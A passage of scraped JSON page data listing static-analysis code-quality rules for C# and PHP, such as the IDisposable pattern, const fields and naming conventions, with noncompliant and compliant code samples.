bool operator== (MyType x, MyType y) \/\/ Noncompliant\n{\n<\/pre>\n<h2>Exceptions<\/h2>\n<ul>\n <li> Classes with overloaded <code>operator +<\/code> or <code>operator -<\/code> methods are ignored. <\/li>\n <li> Classes that implement <code>IComparable<T><\/code> or <code>IEquatable<T><\/code> most probably behave as a value-type objects and\n so are ignored. <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3881","repo":"csharpsquid","name":"\"IDisposable\" should be implemented correctly","htmlDesc":"<p>The <code>IDisposable<\/code> interface is a mechanism to release unmanaged resources, if not implemented correctly this could result in resource\nleaks or more severe bugs.<\/p>\n<p>This rule raises an issue when the recommended dispose pattern, as defined by Microsoft, is not adhered to. See the <strong>Compliant\nSolution<\/strong> section for examples.<\/p>\n<p>Satisfying the rule's conditions will enable potential derived classes to correctly dispose the members of your class:<\/p>\n<ul>\n <li> <code>sealed<\/code> classes are not checked. <\/li>\n <li> If a base class implements <code>IDisposable<\/code> your class should not have <code>IDisposable<\/code> in the list of its interfaces. In such\n cases it is recommended to override the base class's <code>protected virtual void Dispose(bool)<\/code> method or its equivalent. <\/li>\n <li> The class should not implement <code>IDisposable<\/code> explicitly, e.g. the <code>Dispose()<\/code> method should be public. <\/li>\n <li> The class should contain <code>protected virtual void Dispose(bool)<\/code> method. This method allows the derived classes to correctly dispose\n the resources of this class. <\/li>\n <li> The content of the <code>Dispose()<\/code> method should be a single invocation of <code>Dispose(true)<\/code>. <\/li>\n <li> If the class has a finalizer, i.e. a destructor, the only code in its body should be a single invocation of <code>Dispose(false)<\/code>. <\/li>\n <li> If the class has a finalizer, an additional call to <code>GC.SuppressFinalize(this)<\/code> is required in the <code>Dispose()<\/code> method.\n <\/li>\n <li> If the class inherits from a class that implements <code>IDisposable<\/code> it must call the <code>Dispose<\/code>, or\n <code>Dispose(bool)<\/code> method of the base class from within its own implementation of <code>Dispose<\/code> or <code>Dispose(bool)<\/code>,\n respectively. This ensures that all resources from the base class are properly released. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo1 : IDisposable \/\/ Noncompliant - provide protected overridable implementation of Dispose(bool) on Foo or mark the type as sealed.\n{\n public void Dispose() \/\/ Noncompliant - should contain only a call to Dispose(true) and then GC.SuppressFinalize(this)\n {\n \/\/ Cleanup\n }\n}\n\npublic class Foo2 : IDisposable\n{\n void IDisposable.Dispose() \/\/ Noncompliant - Dispose() should be public\n {\n Dispose(true);\n GC.SuppressFinalize(this);\n }\n\n public virtual void Dispose() \/\/ Noncompliant - Dispose() should be sealed\n {\n Dispose(true);\n GC.SuppressFinalize(this);\n }\n}\n\npublic class Foo3 : IDisposable\n{\n public void Dispose()\n {\n Dispose(true);\n GC.SuppressFinalize(this);\n }\n\n protected virtual void Dispose(bool disposing)\n {\n \/\/ Cleanup\n }\n\n ~Foo3() \/\/ Noncompliant - Modify Foo.~Foo() so that it calls Dispose(false) and then returns.\n {\n \/\/ Cleanup\n }\n}{code}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ Sealed class\npublic sealed class Foo1 : IDisposable\n{\n public void Dispose()\n {\n \/\/ Cleanup\n }\n}\n\n\/\/ Simple implementation\npublic class Foo2 : IDisposable\n{\n public void Dispose()\n {\n Dispose(true);\n }\n\n protected virtual void Dispose(bool disposing)\n {\n \/\/ Cleanup\n }\n}\n\n\/\/ Implementation with a finalizer\npublic class Foo3 : IDisposable\n{\n public void Dispose()\n {\n Dispose(true);\n GC.SuppressFinalize(this);\n }\n\n protected virtual void Dispose(bool disposing)\n {\n \/\/ Cleanup\n }\n\n ~Foo3()\n {\n Dispose(false);\n }\n}\n\n\/\/ Base disposable class\npublic class Foo4 : DisposableBase\n{\n protected override void Dispose(bool disposing)\n {\n \/\/ Cleanup\n \/\/ Do not forget to call base\n base.Dispose(disposing);\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<p>Refer to <\/p>\n<ul>\n <li> <a href=\"https:\/\/msdn.microsoft.com\/en-us\/library\/498928w2.aspx\">MSDN<\/a> for complete documentation on the dispose pattern. <\/li>\n <li> <a href=\"http:\/\/blog.stephencleary.com\/2009\/08\/how-to-implement-idisposable-and.html\">Stephen Cleary<\/a> for excellent Q&A about\n IDisposable <\/li>\n <li> <a href=\"http:\/\/pragmateek.com\/c-scope-your-global-state-changes-with-idisposable-and-the-using-statement\/\">Pragma Geek<\/a> for additional\n usages of IDisposable, beyond releasing resources. <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3909","repo":"csharpsquid","name":"Collections should implement the generic interface","htmlDesc":"<p>The NET Framework 2.0 introduced the generic interface <code>System.Collections.Generic.IEnumerable<T><\/code> and it should be preferred over\nthe older, non generic, interfaces.<\/p>\n<p>This rule raises an issue when a public type implements <code>System.Collections.IEnumerable<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nusing System;\nusing System.Collections;\n\npublic class MyData\n{\n public MyData()\n {\n }\n}\n\npublic class MyList : CollectionBase \/\/ Noncompliant\n{\n public void Add(MyData data)\n {\n InnerList.Add(data);\n }\n\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nusing System;\nusing System.Collections.ObjectModel;\n\npublic class MyData\n{\n public MyData()\n {\n }\n}\n\npublic class MyList : Collection<MyData>\n{\n \/\/ Implementation...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3962","repo":"csharpsquid","name":"\"static readonly\" constants should be \"const\" instead","htmlDesc":"<p>The value of a <code>static readonly<\/code> field is computed at runtime while the value of a <code>const<\/code> field is calculated at compile\ntime, which improves performance.<\/p>\n<p>This rule raises an issue when a <code>static readonly<\/code> field is initialiazed with a value that is computable at compile time.<\/p>\n<p>As specified by Microsoft, the list of types that can have a constant value are:<\/p>\n<table>\n <tbody>\n <tr>\n <th>C# type<\/th>\n <th>.Net Fwk type<\/th>\n <\/tr>\n <tr>\n <td>bool<\/td>\n <td>System.Boolean<\/td>\n <\/tr>\n <tr>\n <td>byte<\/td>\n <td>System.Byte<\/td>\n <\/tr>\n <tr>\n <td>sbyte<\/td>\n <td>System.SByte<\/td>\n <\/tr>\n <tr>\n <td>char<\/td>\n <td>System.Char<\/td>\n <\/tr>\n <tr>\n <td>decimal<\/td>\n <td>System.Decimal<\/td>\n <\/tr>\n <tr>\n <td>double<\/td>\n <td>System.Double<\/td>\n <\/tr>\n <tr>\n <td>float<\/td>\n <td>System.Single<\/td>\n <\/tr>\n <tr>\n <td>int<\/td>\n <td>System.Int32<\/td>\n <\/tr>\n <tr>\n <td>uint<\/td>\n <td>System.UInt32<\/td>\n <\/tr>\n <tr>\n <td>long<\/td>\n <td>System.Int64<\/td>\n <\/tr>\n <tr>\n <td>ulong<\/td>\n <td>System.UInt64<\/td>\n <\/tr>\n <tr>\n <td>short<\/td>\n <td>System.Int16<\/td>\n <\/tr>\n <tr>\n <td>ushort<\/td>\n <td>System.UInt16<\/td>\n <\/tr>\n <tr>\n <td>string<\/td>\n <td>System.String<\/td>\n <\/tr>\n <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nnamespace myLib\n{\n public class Foo\n {\n static readonly int x = 1; \/\/ Noncompliant\n static readonly int y = x + 4; \/\/ Noncompliant\n static readonly string s = \"Bar\"; \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nnamespace myLib\n{\n public class Foo\n {\n const int x = 1;\n const int y = x + 4;\n const string s = \"Bar\";\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3963","repo":"csharpsquid","name":"\"static\" fields should be initialized inline","htmlDesc":"<p>When a <code>static<\/code> constructor serves no other purpose that initializing <code>static<\/code> fields, it comes with an unnecessary\nperformance cost because the compiler generates a check before each <code>static<\/code> method or instance constructor invocation.<\/p>\n<p>Instead, inline initialization is highly recommended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nnamespace myLib\n{\n public class Foo\n {\n static int i;\n static string s;\n\n static Foo() \/\/ Noncompliant\n {\n i = 3;\n ResourceManager sm = new ResourceManager(\"strings\", Assembly.GetExecutingAssembly());\n s = sm.GetString(\"mystring\");\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nnamespace myLib\n{\n public class Foo\n {\n static int i =3;\n static string s = InitString();\n\n static string InitString()\n {\n ResourceManager sm = new ResourceManager(\"strings\", Assembly.GetExecutingAssembly());\n return sm.GetString(\"mystring\");\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3981","repo":"csharpsquid","name":"Collection sizes and array length comparisons should make sense","htmlDesc":"<p>The size of a collection and the length of an array are always greater than or equal to zero. So testing that a size or length is greater than or\nequal to zero doesn't make sense, since the result is always <code>true<\/code>. Similarly testing that it is less than zero will always return\n<code>false<\/code>. Perhaps the intent was to check the non-emptiness of the collection or array instead. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(collection.Count >= 0){...}\n\nif(enumerable.Count() < 0){...}\n\nif(array.Length >= 0){...}\n\nbool result = array.Length >=0;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S3984","repo":"csharpsquid","name":"Exception should not be created without being thrown","htmlDesc":"<p>Creating a new <code>Exception<\/code> without actually throwing it is useless and is probably due to a mistake.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x < 0)\n{\n new ArgumentException(\"x must be nonnegative\");\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x < 0)\n{\n throw new ArgumentException(\"x must be nonnegative\");\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S4005","repo":"csharpsquid","name":"\"System.Uri\" arguments should be used instead of strings","htmlDesc":"<p>String representations of URIs or URLs are prone to parsing and encoding errors which can lead to vulnerabilities. The <code>System.Uri<\/code>\nclass is a safe alternative and should be preferred.<\/p>\n<p>This rule raises an issue when a called method has a string parameter with a name containing \"uri\", \"Uri\", \"urn\", \"Urn\", \"url\" or \"Url\" and the\ndeclaring type contains a corresponding overload that takes a <code>System.Uri<\/code> as a parameter.<\/p>\n<p>When there is a choice between two overloads that differ only regarding the representation of a URI, the user should choose the overload that takes\na <code>System.Uri<\/code> argument.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nusing System;\n\nnamespace MyLibrary\n{\n public class Foo\n {\n public void FetchResource(string uriString) { }\n public void FetchResource(Uri uri) { }\n\n public string ReadResource(string uriString, string name, bool isLocal) { }\n public string ReadResource(Uri uri, string name, bool isLocal) { }\n\n public void Main() {\n FetchResource(\"http:\/\/www.mysite.com\"); \/\/ Noncompliant\n ReadResource(\"http:\/\/www.mysite.com\", \"foo-resource\", true); \/\/ Noncompliant\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nusing System;\n\nnamespace MyLibrary\n{\n public class Foo\n {\n public void FetchResource(string uriString) { }\n public void FetchResource(Uri uri) { }\n\n public string ReadResource(string uriString, string name, bool isLocal) { }\n public string ReadResource(Uri uri, string name, bool isLocal) { }\n\n public void Main() {\n FetchResource(new Uri(\"http:\/\/www.mysite.com\"));\n ReadResource(new Uri(\"http:\/\/www.mysite.com\"), \"foo-resource\", true);\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S4019","repo":"csharpsquid","name":"Base class methods should not be hidden","htmlDesc":"<p>When a method in a derived class has the same name as a method in the base class but with a signature that only differs by types that are weakly\nderived (e.g. <code>object<\/code> vs <code>string<\/code>), the result is that the base method becomes hidden.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nusing System;\n\nnamespace MyLibrary\n{\n class Foo\n {\n internal void SomeMethod(string s1, string s2) { }\n }\n\n class Bar : Foo\n {\n internal void SomeMethod(string s1, object o2) { } \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nusing System;\n\nnamespace MyLibrary\n{\n class Foo\n {\n internal void SomeMethod(string s1, string s2) { }\n }\n\n class Bar : Foo\n {\n internal void SomeOtherMethod(string s1, object o2) { }\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S4027","repo":"csharpsquid","name":"Exceptions should provide standard constructors","htmlDesc":"<p>Exceptions types should provide the following constructors:<\/p>\n<ul>\n <li> <code>public MyException()<\/code> <\/li>\n <li> <code>public MyException(string)<\/code> <\/li>\n <li> <code>public MyException(string, Exception)<\/code> <\/li>\n <li> <code>protected<\/code> or <code>private MyException(SerializationInfo, StreamingContext)<\/code> <\/li>\n<\/ul>\n<p>That fourth constructor should be <code>protected<\/code> in unsealed classes, and <code>private<\/code> in sealed classes.<\/p>\n<p>Not having this full set of constructors can make it difficult to handle exceptions.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nusing System;\n\nnamespace MyLibrary\n{\n public class MyException \/\/ Noncompliant: several constructors are missing\n {\n public MyException()\n {\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nusing System;\nusing System.Runtime.Serialization;\n\nnamespace MyLibrary\n{\n public class MyException : Exception\n {\n public MyException()\n {\n }\n\n public MyException(string message)\n :base(message)\n {\n }\n\n public MyException(string message, Exception innerException)\n : base(message, innerException)\n {\n }\n\n protected MyException(SerializationInfo info, StreamingContext context)\n : base(info, context)\n {\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S907","repo":"csharpsquid","name":"\"goto\" statement should not be used","htmlDesc":"<p><code>goto<\/code> is an unstructured control flow statement. It makes code less readable and maintainable. Structured control flow statements such\nas <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>continue<\/code> or <code>break<\/code> should be used instead.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.4 - The goto statement shall not be used. <\/li>\n <li> MISRA C:2012, 15.1 - The goto statement should not be used <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"}],"language":"cs","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};- Exclude checks
BUG found Open
Open
window.data = {"total":112,"p":1,"ps":500,"rules":[{"key":"common-php:DuplicatedBlocks","repo":"common-php","name":"Source files should not have any duplicated blocks","htmlDesc":"An issue is created on a file as soon as there is at least one block of duplicated code on this file","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"common-php:FailedUnitTests","repo":"common-php","name":"Failed unit tests should be fixed","htmlDesc":"Test failures or errors generally indicate that regressions have been introduced. Those tests should be handled as soon as possible to reduce the cost to fix the corresponding regressions.","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"common-php:InsufficientCommentDensity","repo":"common-php","name":"Source files should have a sufficient density of comment lines","htmlDesc":"An issue is created on a file as soon as the density of comment lines on this file is less than the required threshold. The number of comment lines to be written in order to reach the required threshold is provided by each issue message.","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"minimumCommentDensity","defaultValue":"25","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:InsufficientLineCoverage","repo":"common-php","name":"Lines should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the line coverage on this file is less than the required threshold. It gives the number of lines to be covered in order to reach the required threshold.","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"minimumLineCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:SkippedUnitTests","repo":"common-php","name":"Skipped unit tests should be either removed or fixed","htmlDesc":"Skipped unit tests are considered as dead code. Either they should be activated again (and updated) or they should be removed.","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S100","repo":"php","name":"Function names should comply with a naming convention","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. This rule checks that all function names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression: <code>^[a-z][_a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nfunction DoSomething(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(){...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Methods with an <code>@inheritdoc<\/code> annotation, as well as magic methods (<code>__construct()<\/code>, <code>__destruct()<\/code>,\n<code>__call()<\/code>, <code>__callStatic()<\/code>, <code>__get()<\/code>, <code>__set()<\/code>, <code>__isset()<\/code>, <code>__unset()<\/code>,\n<code>__sleep()<\/code>, <code>__wakeup()<\/code>, <code>__toString()<\/code>, <code>__invoke()<\/code>, <code>__set_state()<\/code>,\n<code>__clone()<\/code>, <code>__debugInfo()<\/code>) are ignored.<\/p>\n<pre>\nfunction __construct(){...}\nfunction __destruct(){...}\n\n\/**\n * {@inheritdoc}\n *\/\nfunction myFunc(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the function names against","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S101","repo":"php","name":"Class names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all class\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass my_class {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the class names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S103","repo":"php","name":"Lines should not be too long","htmlDesc":"<p>Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.<\/p>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"maximumLineLength","htmlDesc":"The maximum authorized line length.","defaultValue":"120","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S105","repo":"php","name":"Tabulation characters should not be used","htmlDesc":"<p>Developers should not need to configure the tab width of their text editors in order to be able to read source code.<\/p>\n<p>So the use of tabulation character must be banned.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1066","repo":"php","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n if (condition2) {\n ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1 && condition2) {\n ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1067","repo":"php","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&&<\/code>, <code>||<\/code> and <code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold value of 3<\/p>\n<pre>\nif ((($condition1 && $condition2) || ($condition3 && $condition4)) && $condition5) { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ( (my_first_condition() || my_second_condition()) && my_last_condition()) { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1068","repo":"php","name":"Unused \"private\" fields should be removed","htmlDesc":"<p>If a <code>private<\/code> field is declared but not used in the program, it can be considered dead code and should therefore be removed. This will\nimprove maintainability because developers will not wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass {\n private $foo = 4; \/\/foo is unused\n\n public function compute($a) {\n return $a * 4;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n\n public function compute($a) {\n return $a * 4;\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S107","repo":"php","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 parameters:<\/p>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4, $param5) {\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"},{"key":"constructorMax","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S108","repo":"php","name":"Nested blocks of code should not be left empty","htmlDesc":"<p>Most of the time a block of code is empty when a piece of code is really missing. So such empty block must be either filled or removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i < 42; $i++){} \/\/ Empty on purpose or missing piece of code ?\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a block contains a comment, this block is not considered to be empty.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1105","repo":"php","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition)\n{\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (left and right curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1109","repo":"php","name":"A close curly brace should be located at the beginning of a line","htmlDesc":"<p>Shared coding conventions make it possible for a team to efficiently collaborate. This rule makes it mandatory to place a close curly brace at the\nbeginning of a line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition) {\n doSomething();}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (open and close curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1116","repo":"php","name":"Empty statements should be removed","htmlDesc":"<p>Empty statements, i.e. <code>;<\/code>, are usually introduced by mistake, for example because:<\/p>\n<ul>\n <li> It was meant to be replaced by an actual statement, but this was forgotten. <\/li>\n <li> There was a typo which lead the semicolon to be doubled, i.e. <code>;;<\/code>. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n ; \/\/ Noncompliant - was used as a kind of TODO marker\n}\n\nfunction doSomethingElse($p) {\n echo $p;; \/\/ Noncompliant - double ;\n}\n\nfor ($i = 1; $i <= 10; doSomething($i), $i++); \/\/ Noncompliant - Rarely, they are used on purpose as the body of a loop. It is a bad practice to have side-effects outside of the loop body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething() {}\n\nfunction doSomethingElse($p) {\n echo $p;\n\n for ($i = 1; $i <= 10; $i++) {\n doSomething($i);\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment provided that\n the first character following the null statement is a white-space character. <\/li>\n <li> MISRA C++:2008, 6-2-3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment, provided\n that the first character following the null statement is a white-space character. <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7gCTAw\">CERT, MSC51-J.<\/a> - Do not place a semicolon immediately following an if, for,\n or while condition <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/i4FtAg\">CERT, EXP15-C.<\/a> - Do not place a semicolon on the same line as an if, for,\n or while statement <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1117","repo":"php","name":"Local variables should not have the same name as class fields","htmlDesc":"<p>Shadowing fields with a local variable is a bad practice that reduces code readability: it makes it confusing to know whether the field or the\nvariable is being used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n public $myField;\n\n public function doSomething() {\n $myField = 0;\n ...\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/2ADEAw\">CERT, DCL51-J.<\/a> - Do not shadow or obscure identifiers in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S112","repo":"php","name":"Generic exceptions ErrorException, RuntimeException and Exception should not be thrown","htmlDesc":"<p>If you throw a general exception type, such as ErrorException, RuntimeException, or Exception in a library or framework, it forces consumers to\ncatch all exceptions, including unknown exceptions that they do not know how to handle.<\/p>\n<p>Instead, either throw a subtype that already exists in the Standard PHP Library, or create your own type that derives from Exception.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthrow new Exception(); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nthrow new InvalidArgumentException();\n\/\/ or\nthrow new UnexpectedValueException();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/397.html\">MITRE, CWE-397<\/a> - Declaration of Throws for Generic Exception <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/BoB3AQ\">CERT, ERR07-J.<\/a> - Do not throw RuntimeException, Exception, or Throwable\n <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1124","repo":"php","name":"Modifiers should be declared in the correct order","htmlDesc":"<p>The PSR2 standard recommends listing modifiers in the following order to improve the readability of PHP source code:<\/p>\n<ol>\n <li> final or abstract <\/li>\n <li> public or protected or private <\/li>\n <li> static <\/li>\n<\/ol>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstatic protected $foo;\n...\npublic static final function bar(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprotected static $foo;\n...\nfinal public static function bar(){...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1125","repo":"php","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($booleanVariable == true) { \/* ... *\/ }\nif ($booleanVariable != true) { \/* ... *\/ }\nif ($booleanVariable || false) { \/* ... *\/ }\ndoSomething(!false);\n\n$booleanVariable = condition ? true : exp;\n$booleanVariable = condition ? false : exp;\n$booleanVariable = condition ? exp : true;\n$booleanVariable = condition ? exp : false;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($booleanVariable) { \/* ... *\/ }\nif (!$booleanVariable) { \/* ... *\/ }\nif ($booleanVariable) { \/* ... *\/ }\ndoSomething(true);\n\n$booleanVariable = condition || exp;\n$booleanVariable = !condition && exp;\n$booleanVariable = !condition || exp;\n$booleanVariable = condition && exp;\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1126","repo":"php","name":"Return of boolean expressions should not be wrapped into an \"if-then-else\" statement","htmlDesc":"<p>Return of boolean literal statements wrapped into <code>if-then-else<\/code> ones should be 